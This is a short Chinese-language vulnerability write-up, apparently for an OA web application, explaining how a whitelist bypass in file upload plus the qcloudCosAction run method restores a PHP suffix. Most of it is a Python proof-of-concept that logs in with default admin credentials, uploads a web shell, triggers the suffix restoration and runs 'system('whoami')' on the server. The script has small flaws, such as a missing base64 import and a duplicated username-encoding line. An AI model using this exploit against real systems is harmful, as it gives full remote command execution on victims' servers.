原理
文件上传点存在一个白名单,在白名单之外的内容会被添加后缀并base64编码文件内容,编码后的文件会获得一个id,通过webmain/task/runt/qcloudCosAction.php中的qcloudCosAction类的run方法,提供对应的id即可复原后缀和内容,从而导致上传的文件被解析。
危害
攻击者可获得系统的完整访问权限。
POC & EXP
import requests
session = requests.session()
url_pre = 'http://x.x.x.x/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
username = 'admin' # OA用户名
username = encoded_username = base64.b64encode(username.encode('utf-8')).decode('utf-8')
password = 'admin' # OA用户密码
username = encoded_username = base64.b64encode(username.encode('utf-8')).decode('utf-8')
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': username,
'adminpass': password,
'yanzm': ''
}
r = session.post(url1, data=data1)
file = open('shell.php', 'r+') # 读取shell文件
r = session.post(url2, files={'file': file})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
data2 = {
'AHtest': 'system(\'whoami\')',
}
r = session.post(url_pre + filepath, data=data2)
print(r.text)